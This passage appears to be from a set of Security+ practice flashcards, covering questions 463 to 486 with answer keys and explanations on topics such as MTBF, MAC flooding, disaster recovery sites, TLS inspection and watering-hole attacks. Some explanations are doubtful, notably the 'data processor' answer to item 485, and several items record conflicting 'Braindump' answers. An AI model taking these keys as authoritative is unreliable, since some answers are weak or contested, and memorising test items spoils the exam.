Chain of Custody: Establishing a chain of custody ensures that all evidence collected during the incident response process is properly documented and preserved. This documentation is essential for maintaining the integrity and admissibility of evidence in legal proceedings or internal investigations.

Therefore, collecting IoCs and establishing a chain of custody typically occurs during the Identification phase, as these actions are essential for guiding subsequent containment efforts and ensuring the integrity of evidence throughout the incident response process.

463
Q

Which of the following measures the average time that equipment will operate before it breaks?

a. SLE
b. MTBF
c. RTO
d. ARO

A

b. MTBF (Mean Time Between Failures)

MTBF (Mean Time Between Failures) measures the average time that equipment will operate before it breaks. Here’s a brief explanation of MTBF and why it fits the description:

MTBF: It is a reliability metric that quantifies the expected lifetime of a device or equipment by calculating the average time it is expected to function before experiencing a failure.
Usage: MTBF is commonly used in various industries to assess the reliability and durability of hardware components, systems, or entire products.
Calculation: MTBF is typically calculated as the total operational time divided by the number of failures observed within that time period, providing an average estimation of reliability.

Let’s briefly review why the other options are not correct:

a. SLE (Single Loss Expectancy):

Explanation: SLE estimates the cost or impact of a single security incident or loss.
Not Applicable: SLE is used in risk assessment and management contexts, not to measure equipment operational reliability.

c. RTO (Recovery Time Objective):

Explanation: RTO defines the maximum acceptable downtime for restoring a system, service, or application after an incident or disaster.
Not Applicable: RTO is a measure of how quickly a system needs to be recovered after a failure, not the average operational time before failure.

d. ARO (Annualized Rate of Occurrence):

Explanation: ARO estimates the frequency or likelihood of a specific type of incident occurring within a given time frame, typically annually.
Not Applicable: ARO quantifies the probability of occurrence of incidents, such as security breaches or natural disasters, and is not related to measuring equipment operational time before failure.

Therefore, b. MTBF (Mean Time Between Failures) is the measure that specifically quantifies the average time that equipment will operate before it breaks down.

464
Q

A security administrator examines the ARP table of an access switch and sees the following output:

VLAN MAC Address Type Ports
All 012b1283f77b STATIC CPU
All c656da1009f1 STATIC CPU
1 f9de6ed7d38f DYNAMIC Fa0/1
2 fb8d0ae3850b DYNAMIC Fa0/2
2 7f403b7cf59a DYNAMIC Fa0/2
2 f4182c262c61 DYNAMIC Fa0/2

a. DDoS on Fa0/2 port
b. MAC flooding on Fa0/2 port
c. ARP poisoning on Fa0/1 port
d. DNS poisoning on port Fa0/1

A

b. MAC flooding on Fa0/2 port

Based on the ARP table output, it appears that there are multiple MAC addresses associated with port Fa0/2, which suggests that MAC flooding may be occurring on this port. Therefore, the correct answer is B. MAC flooding on Fa0/2 port.

ARP poisoning is a type of attack where the attacker sends fake ARP messages to associate their own MAC address with the IP address of another device on the network. However, there is no evidence of this type of attack in the ARP table output provided.

DDoS and DNS poisoning attacks are not related to the information provided in the ARP table output, so options A and D are incorrect.

465
Q

Which of the following documents specifies what to do in the event of catastrophic loss of a physical or virtual system?

a. Data retention plan
b. Incident response plan
c. Disaster recovery plan
d. Communication plan

A

(Community C 88%)
c. Disaster recovery plan

The document that specifies what to do in the event of catastrophic loss of a physical or virtual system is the Disaster Recovery Plan (DRP).

Here’s a brief explanation of why DRP is the correct answer:

Disaster Recovery Plan: A DRP outlines the procedures and processes to recover and restore IT infrastructure, systems, and data after a catastrophic event such as a natural disaster, cyberattack, or hardware failure.
Focus: The primary focus of a DRP is on ensuring business continuity and minimizing downtime by defining recovery strategies, roles and responsibilities, backup and recovery procedures, and the sequence of steps to be followed during and after a disaster.
Scope: A DRP covers various scenarios including data loss, infrastructure damage, and system outages, providing a structured approach to restore operations quickly and effectively.

Let’s briefly review why the other options are less likely to be correct:

a. Data retention plan:

Explanation: A data retention plan specifies policies and procedures for retaining and disposing of data based on regulatory requirements and business needs.
Not Applicable: While important for managing data lifecycle, a data retention plan does not specifically address catastrophic loss or disaster recovery.

b. Incident response plan:

Explanation: An incident response plan outlines steps to detect, respond to, and recover from cybersecurity incidents or breaches.
Not Applicable: While related to handling incidents, it focuses more on cybersecurity events rather than comprehensive recovery from catastrophic system loss.

d. Communication plan:

Explanation: A communication plan defines how information is shared internally and externally during and after a crisis or incident.
Not Applicable: While critical for managing communication during disasters, it does not specifically address the technical recovery aspects of systems and data after catastrophic loss.

Therefore, the document that specifically addresses what to do in the event of catastrophic loss of a physical or virtual system is the Disaster Recovery Plan (c).

466
Q

Which of the following rales is responsible for defining the protection type and classification type for a given set of files?

a. General counsel
b. Data owner
c. Risk manager
d. Chief Information Officer

A

b. Data owner

The role responsible for defining the protection type and classification type for a given set of files is the Data owner.

Here’s why:

Data Owner: The data owner is typically a business or functional manager who has the responsibility and authority to determine the classification and protection requirements for specific sets of data or files.
Responsibilities: Among the responsibilities of a data owner are defining the sensitivity level (classification) of data based on its importance and regulatory requirements, and specifying the appropriate security controls and protections needed to safeguard that data.
Influence: Data owners work closely with security professionals and other stakeholders to ensure that data handling practices align with organizational policies and legal requirements.

Let’s briefly review why the other options are less likely to be correct:

a. General counsel:

Explanation: General counsel typically provides legal advice and guidance on legal matters, including data protection and compliance.
Not Applicable: While general counsel may advise on data protection policies, they typically do not directly define the protection type and classification for specific sets of files.

c. Risk manager:

Explanation: Risk managers assess and mitigate risks within an organization, including risks related to data security and compliance.
Not Applicable: Risk managers focus on overall risk management strategies and may provide input on data classification and protection, but they do not define these specifics for individual files.

d. Chief Information Officer (CIO):

Explanation: The CIO oversees the organization's information technology strategy and operations.
Not Applicable: While the CIO plays a role in setting IT policies and strategies, defining the protection type and classification type for specific files is typically the responsibility of data owners who are closer to the specific data and its business context.

Therefore, b. Data owner is the role responsible for defining the protection type and classification type for a given set of files within an organization.

467
Q

An employee’s company email is configured with conditional access and requires that MFA is enabled and used. An example of MFA is a phone call and:

a. a push notification
b. a password
c. an SMS message
d. an authentication application

A

b. a password

phone call -> something you have
push notif -> something you have
SMS mess -> something you have
auth app -> something you have
password -> something you know

468
Q

Which of the following is a security implication of newer ICS devices that are becoming more common in corporations?

a. Devices with cellular communication capabilities bypass traditional network security controls
b. Many devices do not support elliptic-curve encryption algorithms due to the overhead they require
c. These devices often lack privacy controls and do not meet newer compliance regulations
d. Unauthorized voice and audio recording can cause loss of intellectual property

A

a. Devices with cellular communication capabilities bypass traditional network security controls

Here’s the reasoning:

ICS Devices: Industrial Control Systems (ICS) devices are critical to industrial operations and are increasingly integrated into corporate networks.
Cellular Communication: Newer ICS devices often come equipped with cellular communication capabilities to facilitate remote monitoring and management.
Security Implication: Cellular communication allows these devices to bypass traditional network security controls such as firewalls and intrusion detection systems (IDS). This creates potential security vulnerabilities as these devices may not be as tightly controlled or monitored as devices directly connected to corporate networks.
Risk: Cellular connections may expose ICS devices to attacks or unauthorized access from external networks, increasing the risk of compromise and potential impact on industrial operations.

Let’s briefly review why the other options are less likely to be correct:

b. Many devices do not support elliptic-curve encryption algorithms due to the overhead they require:

Explanation: While encryption algorithm support is important for security, it is not specifically tied to the integration of newer ICS devices into corporate networks.

c. These devices often lack privacy controls and do not meet newer compliance regulations:

Explanation: Compliance and privacy controls are important considerations, but they are not directly tied to the security implications of cellular communication capabilities in ICS devices.

d. Unauthorized voice and audio recording can cause loss of intellectual property:

Explanation: Unauthorized voice and audio recording is a specific security concern but is not directly related to the integration of ICS devices with cellular communication capabilities.

Therefore, a. Devices with cellular communication capabilities bypass traditional network security controls is the security implication commonly associated with newer ICS devices becoming more common in corporations.

469
Q

Which of the following is required in order for an IDS and a WAF to be effective on HTTPS traffic?

a. Hashing
b. DNS sinkhole
c. TLS inspection
d. Data masking

A

c. TLS inspection

To effectively inspect HTTPS traffic using an Intrusion Detection System (IDS) and a Web Application Firewall (WAF), TLS inspection is required.

Here’s why TLS inspection (also known as SSL inspection or HTTPS inspection) is necessary:

HTTPS Encryption: HTTPS encrypts traffic between clients and servers using Transport Layer Security (TLS) or its predecessor, Secure Sockets Layer (SSL). This encryption prevents visibility into the actual content of the traffic by intermediaries, including security devices like IDS and WAF.

TLS Inspection: TLS inspection involves decrypting and inspecting the contents of HTTPS traffic. This allows security devices such as IDS and WAF to analyze the decrypted traffic for potential threats, attacks, or policy violations.

Effectiveness: Without TLS inspection, IDS and WAF can only inspect the metadata (such as IP addresses, ports, and header information) of HTTPS packets, but not the actual payload contents, which limits their effectiveness in detecting and blocking sophisticated attacks embedded within encrypted traffic.

Let’s briefly review why the other options are less likely to be correct:

a. Hashing:

Explanation: Hashing is a cryptographic technique used for data integrity and authenticity, but it does not provide the ability to inspect or decrypt HTTPS traffic for security analysis.

b. DNS sinkhole:

Explanation: DNS sinkholing is a technique used to redirect malicious domain names to a benign IP address, primarily for blocking malicious content. It is not directly related to inspecting or decrypting HTTPS traffic.

d. Data masking:

Explanation: Data masking is used to obfuscate or hide sensitive data, typically for privacy or compliance purposes. It does not involve decrypting or inspecting HTTPS traffic for security analysis.

Therefore, c. TLS inspection is necessary for IDS and WAF to effectively analyze and protect against threats within HTTPS traffic by decrypting and inspecting the encrypted payload.

470
Q

A company policy requires third-party suppliers to self-report data breaches within a specific time frame. Which of the following third-party risk management policies is the company complying with?

a. MOU
b. SLA
c. EOL
d. NDA

A

b. SLA (Service Level Agreement)

The company policy requiring third-party suppliers to self-report data breaches within a specific time frame aligns with the concept of a Service Level Agreement (SLA).

Here’s why:

Service Level Agreement (SLA): An SLA is a contract between a service provider (in this case, third-party suppliers) and their customer (the company). It defines the level of service expected from the supplier, including performance metrics, responsibilities, and guarantees.

Compliance: SLAs often include clauses related to security, data protection, and incident response. Requiring suppliers to self-report data breaches within a specific time frame is a measure to ensure compliance with agreed-upon security and incident response protocols outlined in the SLA.

Risk Management: Third-party risk management involves assessing, monitoring, and mitigating risks associated with outsourcing services to suppliers. A well-defined SLA helps manage these risks by setting expectations and responsibilities related to data security incidents.

Let’s briefly review why the other options are less likely to be correct:

a. MOU (Memorandum of Understanding):

Explanation: An MOU is a non-binding agreement that outlines the terms and details of a partnership or agreement between parties. It typically does not include specific contractual obligations related to incident reporting.

c. EOL (End of Life):

Explanation: EOL refers to the end of a product's or service's life cycle, indicating it is no longer supported or maintained. It is not directly related to third-party risk management or incident reporting requirements.

d. NDA (Non-Disclosure Agreement):

Explanation: An NDA is a legal contract that establishes confidentiality obligations between parties, preventing the disclosure of confidential information. While important for protecting sensitive information, it does not specify incident reporting requirements.

Therefore, the company’s policy of requiring third-party suppliers to self-report data breaches within a specific time frame is most closely aligned with b. SLA (Service Level Agreement), which sets forth the contractual obligations and expectations related to incident reporting and data security.

471
Q

While troubleshooting service disruption on a mission-critical server, a technician discovered the user account that was configured to run automated processes was disabled because the user s password failed to meet password complexity requirements. Which of the following would be the best solution to securely prevent future issues?

a. Using an administrator account to run the processes and disabling the account when it is not in use
b. Implementing a shared account the team can use to run automated processes
c. Configuring a service account to run the processes
d. Removing the password complexity requirements for the user account

A

c. Configuring a service account to run the processes

Here’s why configuring a service account is the best solution:

Service Account: A service account is specifically designed for running automated processes and services within an IT environment. Unlike regular user accounts, service accounts are typically configured with non-expiring passwords and are exempt from password complexity requirements.

Security Best Practice: It's a best practice to use dedicated service accounts for automated processes to ensure continuity and security. These accounts are configured with appropriate permissions and settings for the specific tasks they perform.

Mitigation: By configuring a service account, you ensure that automated processes continue to run smoothly without being affected by password complexity requirements or other user account policies.

Let’s briefly review why the other options are less likely to be correct:

a. Using an administrator account to run the processes and disabling the account when it is not in use:

Explanation: Using an administrator account for automated processes can introduce security risks due to elevated privileges. Additionally, disabling and enabling accounts manually is not practical for automated processes.

b. Implementing a shared account the team can use to run automated processes:

Explanation: Shared accounts are generally discouraged for security reasons, as they make it difficult to trace activities to specific individuals or processes. They also do not address the issue of password complexity requirements for automated processes.

d. Removing the password complexity requirements for the user account:

Explanation: Removing password complexity requirements compromises security best practices and exposes the account to potential vulnerabilities. It's important to maintain strong password policies across all accounts for security reasons.

Therefore, c. Configuring a service account to run the processes is the best solution to securely prevent future issues with automated processes on the mission-critical server.

472
Q

A security analyst is assessing a newly developed web application by testing SQL injection, CSRF, and XML injection. Which of the following frameworks should the analyst consider?

a. ISO
b. MITRE ATT&CK
c. OWASP
d. NIST

A

c. OWASP

The OWASP (Open Web Application Security Project) framework is specifically focused on web application security testing and provides guidelines and resources for testing various vulnerabilities such as SQL injection, CSRF (Cross-Site Request Forgery), and XML injection.

Here’s why OWASP is the appropriate framework for the security analyst:

OWASP: OWASP is a community-driven organization that provides freely available articles, methodologies, documentation, tools, and technologies in the field of web application security. It maintains a widely recognized list of the top web application security risks, including vulnerabilities like SQL injection, CSRF, and XML injection.

Assessment Focus: When assessing a new web application, security analysts often refer to OWASP's resources to understand common vulnerabilities and how to test for them effectively.

Let’s briefly review why the other options are less likely to be correct:

a. ISO (International Organization for Standardization):

Explanation: ISO standards cover a broad range of topics, including security standards, but they are not specifically focused on web application security testing methodologies like OWASP.

b. MITRE ATT&CK:

Explanation: MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a framework focused on understanding and categorizing adversary behaviors in cybersecurity. It does not specifically address web application vulnerabilities or testing methodologies.

d. NIST (National Institute of Standards and Technology):

Explanation: NIST provides cybersecurity and information security standards and guidelines, but like ISO, it does not specifically focus on web application security testing methodologies as OWASP does.

Therefore, c. OWASP is the framework that the security analyst should consider when assessing the new web application for vulnerabilities like SQL injection, CSRF, and XML injection.

473
Q

A user s laptop constantly disconnects from the Wi-Fi network. Once the laptop reconnects, the user can reach the internet but cannot access shared folders or other network resources. Which of the following types of attacks is the user most likely experiencing?

a. Bluejacking
b. Jamming
c. Rogue access point
d. Evil twin

A

Braindump : d. Evil twin

The user is most likely experiencing an Evil Twin attack. In this type of attack, an attacker creates a fake access point with the same name as the legitimate access point to which the user is trying to connect. The attacker can then intercept and eavesdrop on the user’s network traffic, potentially stealing sensitive information. The user’s laptop may be disconnecting and reconnecting to the fake access point, causing the inability to access shared folders or other network resources.

474
Q

Which of the following procedures would be performed after the root cause of a security incident has been identified to help avoid future incidents from occurring?

a. Walk-throughs
b. Lessons learned
c. Attack framework alignment
d. Containment

A

b. Lessons learned

After identifying the root cause of a security incident, the next step to help avoid future incidents from occurring is typically to conduct lessons learned.

Here’s why:

Lessons Learned: Lessons learned involve analyzing the incident, understanding what went wrong, identifying gaps or weaknesses in existing security measures or practices, and deriving actionable insights. This process helps organizations improve their security posture by implementing corrective actions, updating policies or procedures, enhancing training, or making technological improvements.

Purpose: The primary goal of lessons learned is to turn the incident into a learning opportunity. It enables organizations to strengthen their defenses against similar incidents in the future by addressing root causes and improving incident response processes.

Let’s briefly review why the other options are less likely to be correct:

a. Walk-throughs:

Explanation: Walk-throughs typically refer to rehearsals or simulations of incident response plans. While useful for preparedness and training, they are not specifically focused on addressing root causes identified after an incident.

c. Attack framework alignment:

Explanation: Attack framework alignment involves mapping incident details to known attack frameworks (such as MITRE ATT&CK) to understand the tactics, techniques, and procedures (TTPs) used by attackers. While this can provide valuable insights, it is more focused on understanding the incident rather than preventing future incidents directly.

d. Containment:

Explanation: Containment refers to the immediate actions taken during the incident response process to limit the impact and scope of the incident. Once containment is achieved and the root cause is identified, the focus shifts to implementing lessons learned and preventing future incidents.

Therefore, b. Lessons learned is the procedure typically performed after identifying the root cause of a security incident to help avoid future incidents from occurring by improving overall security practices and defenses.

475
Q

A security administrator is integrating several segments onto a single network. One of the segments, which includes legacy devices, presents a significant amount of risk to the network. Which of the following would allow users to access to the legacy devices without compromising the security of the entire network?

a. NIDS
b. MAC filtering
c. Jump server
d. IPSec
e. NAT gateway

A

c. Jump server

A jump server (also known as a bastion host) is the best option among the choices provided to allow users to access legacy devices without compromising the security of the entire network. Here’s why:

Jump Server: A jump server is a hardened system that acts as an intermediary or gateway through which users can access specific devices or segments of a network. It is typically configured with stringent security controls, such as multi-factor authentication (MFA), strong password policies, and access logging.

Benefits: By using a jump server, users can securely connect to the segment containing legacy devices without directly exposing those devices to the broader network. This setup adds an additional layer of security because access to the legacy devices is controlled and monitored through a single entry point (the jump server).

Let’s briefly review why the other options are less likely to be correct:

a. NIDS (Network Intrusion Detection System):

Explanation: A NIDS monitors network traffic for suspicious activity or known threats. While important for detecting threats, it does not specifically address how to securely access legacy devices without compromising the network.

b. MAC filtering:

Explanation: MAC filtering restricts network access based on the MAC addresses of devices. However, MAC addresses can be spoofed, and this method does not provide sufficient security controls or isolation for accessing legacy devices.

d. IPSec (Internet Protocol Security):

Explanation: IPSec provides secure communication over IP networks by encrypting and authenticating IP packets. While it enhances security for data in transit, it does not specifically address secure access to legacy devices or segmenting network access.

e. NAT gateway (Network Address Translation gateway):

Explanation: A NAT gateway translates private IP addresses to public IP addresses and vice versa, providing a form of network address translation. It does not provide the necessary isolation and access control mechanisms required for securely accessing legacy devices.

Therefore, c. Jump server is the most appropriate solution for allowing users to access legacy devices while mitigating the security risks associated with integrating them into a single network segment.

476
Q

Which of the following would a security analyst use to determine if other companies in the same sector have seen similar malicious activity against their systems?

a. Vulnerability scanner
b. Open-source intelligence
c. Packet capture
d. Threat feeds

A

d. Threat feeds

Threat feeds would be used by a security analyst to determine if other companies in the same sector have seen similar malicious activity against their systems.

Here’s why:

Threat Feeds: Threat feeds provide up-to-date information about known threats, attack patterns, and malicious activities observed globally or within specific sectors. Security analysts use threat feeds to gather intelligence on emerging threats and to understand if similar incidents have been reported by other organizations in the same sector.

Purpose: By monitoring threat feeds, analysts can gain insights into the tactics, techniques, and procedures (TTPs) used by threat actors targeting similar industries. This information helps organizations proactively defend against potential attacks by implementing appropriate security measures and defenses.

Let’s briefly review why the other options are less likely to be correct:

a. Vulnerability Scanner:

Explanation: A vulnerability scanner is used to identify weaknesses in systems, applications, or networks by scanning for known vulnerabilities. It does not provide information about malicious activities observed by other companies in the sector.

b. Open-source Intelligence (OSINT):

Explanation: OSINT involves gathering information from publicly available sources to understand potential threats and vulnerabilities. While useful for broad intelligence gathering, it may not specifically provide information about sector-specific malicious activities.

c. Packet Capture:

Explanation: Packet capture involves capturing and analyzing network traffic to understand communication patterns and detect anomalies. It is useful for network troubleshooting and forensics but does not provide sector-wide intelligence on malicious activities.

Therefore, d. Threat feeds is the most appropriate tool for a security analyst to use when determining if other companies in the same sector have experienced similar malicious activity against their systems.

(Braindump : b. Open-source intelligence)

477
Q

Which of the following types of disaster recovery plan exercises requires the least interruption to IT operations?

a. Parallel
b. Full-scale
c. Tabletop
d. Simulation

A

c. Tabletop

A tabletop exercise is a type of disaster recovery plan exercise that requires the least interruption to IT operations. Here’s why:

Tabletop Exercise: In a tabletop exercise, participants gather together in a conference room or virtual setting to discuss and simulate a hypothetical disaster scenario. They walk through the steps they would take, discuss roles and responsibilities, and evaluate the effectiveness of their disaster recovery plan (DRP) without actually executing any IT operations.

Minimal Interruption: Unlike other types of exercises, such as full-scale exercises or simulations, a tabletop exercise does not involve live IT systems or actual disruption of IT operations. It focuses more on testing and refining the disaster recovery procedures, communication protocols, and decision-making processes among key stakeholders.

Let’s briefly review why the other options are less likely to be correct:

a. Parallel Exercise:

Explanation: In a parallel exercise, a duplicate IT environment is set up and run simultaneously with the production environment to test the effectiveness of the DRP. This can potentially impact IT operations due to the resources required to maintain the parallel environment.

b. Full-scale Exercise:

Explanation: A full-scale exercise involves testing the entire disaster recovery plan in a real-world scenario, often with actual execution of IT operations in a controlled environment. This type of exercise can cause significant interruption to IT operations.

d. Simulation:

Explanation: A simulation involves creating a scenario that closely mimics a real disaster to test the response capabilities of the organization. While it may not involve actual IT operations, it often requires extensive planning and coordination, potentially interrupting normal business activities.

Therefore, c. Tabletop is the type of disaster recovery plan exercise that requires the least interruption to IT operations, making it valuable for training and assessing preparedness without impacting day-to-day business activities.

478
Q

Which of the follow ng disaster recovery sites is the most cost effective to operate?

a. Warm site
b. Cold site
c. Hot site
d. Hybrid site

A

b. Cold site

A cold site is the most cost-effective disaster recovery site to operate among the options provided. Here’s why:

Cold Site: A cold site is a facility that provides only the basic infrastructure (such as power and HVAC systems) for IT operations. It does not have active computer systems or pre-installed software. In the event of a disaster, organizations need to install and configure their equipment and software, which can take time but is less costly than maintaining active systems.

Cost Consideration: Cold sites are less expensive because they do not require the ongoing maintenance, power consumption, and licensing fees associated with active IT systems (as seen in hot and warm sites). Organizations save on operational costs by paying for the infrastructure only when it is needed during a disaster recovery event.

Let’s briefly review why the other options are less likely to be correct:

a. Warm Site:

Explanation: A warm site is a facility that has some pre-installed IT equipment, such as servers and network connections. However, it may lack current data or configurations. Warm sites are more expensive than cold sites because they require ongoing maintenance and operational readiness to quickly deploy IT systems during a disaster.

c. Hot Site:

Explanation: A hot site is a fully operational facility with active IT systems, real-time data replication, and all necessary infrastructure. Hot sites are the most expensive option because they require continuous operational expenses, including power, cooling, staffing, and licensing fees.

d. Hybrid Site:

Explanation: A hybrid site combines elements of different types of disaster recovery sites, such as integrating cloud-based services with on-premises infrastructure. Hybrid sites are typically tailored to specific organizational needs and may vary widely in cost depending on the configuration.

Therefore, b. Cold site is considered the most cost-effective disaster recovery site to operate due to its minimal ongoing operational costs and infrastructure maintenance requirements until it is needed for disaster recovery purposes.

479
Q

A security operations center wants to implement a solution that can execute files to test for malicious activity. The solution should provide a report of the files’ activity against known threats. Which of the following should the security operations center implement?

a. the Harvester
b. Nessus
c. Cuckoo
d. Sn1per

A

c. Cuckoo

Cuckoo is a suitable solution for the security operations center (SOC) to implement in this scenario. Here’s why:

Cuckoo: Cuckoo Sandbox is an open-source automated malware analysis system. It allows files to be executed in a controlled environment to observe their behavior and interactions with the operating system. Cuckoo analyzes files and provides detailed reports on their activities, helping SOC analysts identify potential malicious behavior based on known threats and behavioral patterns.

Functionality: With Cuckoo, SOC teams can submit files for analysis, monitor their execution in a sandboxed environment, and receive comprehensive reports that detail the files' activities, network communications, and any potential indicators of compromise (IOCs).

Let’s briefly review why the other options are less likely to be correct:

a. theHarvester:

Explanation: theHarvester is a tool used for gathering email addresses, user names, and other information from publicly available sources. It is not designed for executing files and analyzing their behavior for malicious activity.

b. Nessus:

Explanation: Nessus is a vulnerability scanner that identifies vulnerabilities in systems and networks by scanning for known security issues. It does not execute files or analyze their behavior against known threats.

d. Sn1per:

Explanation: Sn1per is a penetration testing tool used for scanning and testing network security. It focuses on finding vulnerabilities and performing security assessments, rather than executing and analyzing files for malicious activity.

Therefore, c. Cuckoo is the appropriate solution for the SOC to implement when they need to execute files to test for malicious activity and receive detailed reports on the files’ behavior against known threats.

480
Q

A security administrator would like to ensure all cloud servers will have software preinstalled for facilitating vulnerability scanning and continuous monitoring. Which of the following concepts should the administrator utilize?

a. Provisioning
b. Staging
c. Staging
d. Quality assurance

A

a. Provisioning

Provisioning is the concept the security administrator should utilize to ensure all cloud servers have software preinstalled for facilitating vulnerability scanning and continuous monitoring. Here’s why:

Provisioning: In the context of IT and cloud computing, provisioning refers to the process of setting up and preparing IT resources, such as servers, networks, or software applications, to be ready for use. It involves installing necessary software, configuring settings, and ensuring that all components are operational and accessible.

Role in Security: For security purposes, provisioning ensures that security tools, such as vulnerability scanning software and continuous monitoring agents, are installed and configured on cloud servers before they are put into production. This proactive approach helps to maintain security posture by continuously monitoring and scanning for vulnerabilities and threats.

Let’s briefly review why the other options are less likely to be correct:

b. Staging:

Explanation: Staging involves preparing and testing IT systems or applications in a controlled environment before they are deployed into production. It focuses more on testing functionality and performance rather than ensuring security tools are preinstalled.

c. Staging (duplicate option):

d. Quality assurance:

Explanation: Quality assurance (QA) involves processes and activities that ensure products or services meet specified requirements and quality standards. While important for overall system integrity, QA does not specifically address the preinstallation of security tools for vulnerability scanning and continuous monitoring.

Therefore, a. Provisioning is the correct concept for the security administrator to use when ensuring that all cloud servers have software preinstalled for facilitating vulnerability scanning and continuous monitoring.

481
Q

A network architect wants a server to have the ability to retain network availability even if one of the network switches it is connected to goes down. Which of the following should the architect implement on the server to achieve this goal?

a. RAID
b. UPS
c. NIC teaming
d. Load balancing

A

c. NIC teaming

NIC (Network Interface Card) teaming, also known as NIC bonding or link aggregation, is the solution the network architect should implement on the server to ensure network availability even if one of the network switches it is connected to goes down. Here’s why:

NIC Teaming: NIC teaming combines multiple network interfaces into a single logical interface. By configuring NIC teaming on the server, it can maintain network connectivity even if one of the physical switches fails. The server can continue to communicate through the other NICs that are still connected to operational switches, thereby ensuring network availability and redundancy.

Fault Tolerance: NIC teaming provides fault tolerance by enabling failover mechanisms. If one NIC or switch fails, traffic can automatically fail over to the remaining NICs that are still functional, minimizing downtime and maintaining network connectivity.

Let’s briefly review why the other options are less likely to be correct:

a. RAID (Redundant Array of Independent Disks):

Explanation: RAID is a storage technology that combines multiple physical disks into a single logical unit for data redundancy and performance improvement. While RAID enhances data availability and fault tolerance for storage, it does not directly address network availability or switch failures.

b. UPS (Uninterruptible Power Supply):

Explanation: A UPS provides backup power to devices during power outages, ensuring they remain operational. It protects against power-related interruptions but does not directly address network switch failures.

d. Load Balancing:

Explanation: Load balancing distributes incoming network traffic across multiple servers or network paths to optimize resource utilization, maximize throughput, and minimize response time. It does not inherently provide redundancy in case of network switch failures.

Therefore, c. NIC teaming is the appropriate solution for the network architect to implement on the server to retain network availability even if one of the network switches it is connected to goes down.

482
Q

An employee received multiple messages on a mobile device. The messages were instructing the employee to pair the device to an unknown device. Which of the follow ng best describes what a malicious person might be doing to cause this issue to occur?

a. Jamming
b. Bluesnarfing
c. Evil twin attack
d. Rogue access point

A

b. Bluesnarfing

Bluesnarfing best describes the scenario where an employee receives messages instructing them to pair their mobile device with an unknown device. Here’s why:

Bluesnarfing: Bluesnarfing is a type of attack where unauthorized access is gained to information on a wireless device through a Bluetooth connection. Malicious actors exploit vulnerabilities in Bluetooth security to access data such as contact lists, emails, text messages, and even calendar information without the user's knowledge or consent. They can initiate the pairing process remotely and gain access to sensitive data stored on the device.

Let’s briefly review why the other options are less likely to be correct:

a. Jamming:

Explanation: Jamming refers to the interference of wireless signals, disrupting communication between devices. It does not involve initiating Bluetooth pairing or accessing device data.

c. Evil twin attack:

Explanation: An evil twin attack involves setting up a rogue Wi-Fi access point with a similar name to a legitimate access point to trick users into connecting to it. It does not directly involve Bluetooth pairing or accessing data on mobile devices.

d. Rogue access point:

Explanation: A rogue access point is an unauthorized wireless access point that has been installed on a network without the knowledge of the network administrator. It typically targets Wi-Fi networks rather than Bluetooth connections.

Therefore, b. Bluesnarfing is the most appropriate description of what a malicious person might be doing to cause the issue where an employee receives messages instructing them to pair their mobile device with an unknown device.

483
Q

A security administrator installed a new web server. The administrator did this to increase the capacity for an application due to resource exhaustion on another server. Which of the following algorithms should the administrator use to split the number of the connections on each server in half?

a. Weighted response
b. Round-robin
c. Least connection
d. Weighted least connection

A

b. Round-robin

Round-robin is the algorithm the administrator should use to split the number of connections evenly between the two web servers. Here’s why:

Round-robin: In a round-robin load balancing algorithm, each server in the pool is assigned connections in a sequential order. When a new connection request comes in, it is directed to the next server in the list. This method distributes incoming connections evenly among all servers, ensuring that each server handles an equal number of connections over time.

Suitability: For the scenario where the administrator wants to split the number of connections in half between two servers, round-robin is straightforward and effective. It does not take into account server load or capacity but simply distributes connections in a cyclic manner.

Let’s briefly review why the other options are less likely to be correct:

a. Weighted response:

Explanation: Weighted response is not a standard load balancing algorithm. It may refer to a method where server responses are weighted based on certain factors, but it does not describe a load distribution algorithm like round-robin.

c. Least connection:

Explanation: The least connection algorithm directs new connections to the server with the fewest active connections at the time of the request. It does not necessarily split connections evenly between servers but rather routes traffic to the server with the least load.

d. Weighted least connection:

Explanation: Weighted least connection is a load balancing algorithm that considers both the number of active connections and the server's capacity or weight. It adjusts the distribution of connections based on server load metrics, which is more complex than evenly splitting connections between two servers.

Therefore, b. Round-robin is the most suitable algorithm for the security administrator to use to split the number of connections evenly between the two newly installed web servers.

484
Q

Security analysts have noticed the network becomes flooded with malicious packets at specific times of the day. Which of the following should the analysts use to investigate this issue?

a. Web metadata
b. Bandwidth monitors
c. System files
d. Correlation dashboards

A

b. Bandwidth monitors

Bandwidth monitors would be the most appropriate tool for investigating the issue of network flooding with malicious packets at specific times of the day. Here’s why:

Bandwidth Monitors: Bandwidth monitoring tools track and analyze the amount of network traffic passing through a specific point in the network. They can provide detailed statistics about the volume and type of traffic, including spikes in traffic that could indicate malicious activities such as flooding with malicious packets.

Use Case: In this scenario, bandwidth monitors can help security analysts pinpoint the exact times when the network experiences a surge in traffic associated with malicious packets. This information is crucial for understanding the scope of the issue, identifying patterns or trends in the attack, and potentially correlating it with other security events.

Let’s briefly review why the other options are less likely to be correct:

a. Web metadata:

Explanation: Web metadata typically refers to information related to web traffic, such as HTTP headers or logs. It is not directly related to monitoring network traffic for malicious packets.

c. System files:

Explanation: System files on individual devices may contain logs or information related to local system events or activities. They are not typically used to monitor or analyze network-wide traffic patterns.

d. Correlation dashboards:

Explanation: Correlation dashboards aggregate and visualize data from multiple sources to identify relationships or patterns. While useful for correlating security events and identifying trends, they rely on data from various sources rather than directly monitoring network traffic.

Therefore, b. Bandwidth monitors is the tool that security analysts should use to investigate the issue of network flooding with malicious packets at specific times of the day.

485
Q

A security administrator performs weekly vulnerability scans on all cloud assets and provides a detailed report. Which of the following describes the administrator’s activities?

a. Continuous deployment
b. Continuous integration
c. Data owners
d. Data processor

A

d. Data processor

Here’s why:

Data Processor: A data processor is an entity that processes data on behalf of a data controller. In this scenario, the security administrator is actively involved in processing data (performing vulnerability scans) related to the cloud assets owned by the organization. The vulnerability scans generate reports that provide insights into the security posture of the cloud assets.

Continuous Deployment and Continuous Integration: These terms refer to software development practices rather than security assessment activities. Continuous deployment involves automatically deploying code changes into production, while continuous integration involves frequently integrating code changes into a shared repository.

Data Owners: Data owners are typically responsible for overseeing the governance and management of specific data within an organization. They define how data should be used and protected, but they are not directly involved in vulnerability scanning activities.

Therefore, the most appropriate term describing the security administrator’s role in this context is:

d. Data processor

486
Q

An attacker is targeting a company. The attacker notices that the company’s employees frequently access a particular website. The attacker decides to infect the website with malware and hopes the employees’ devices will also become infected. Which of the follow ng techniques is the attacker using?

a. Watering-hole attack
b. Pretexting
c. Typosquatting
d. Impersonation

A

a. Watering-hole attack

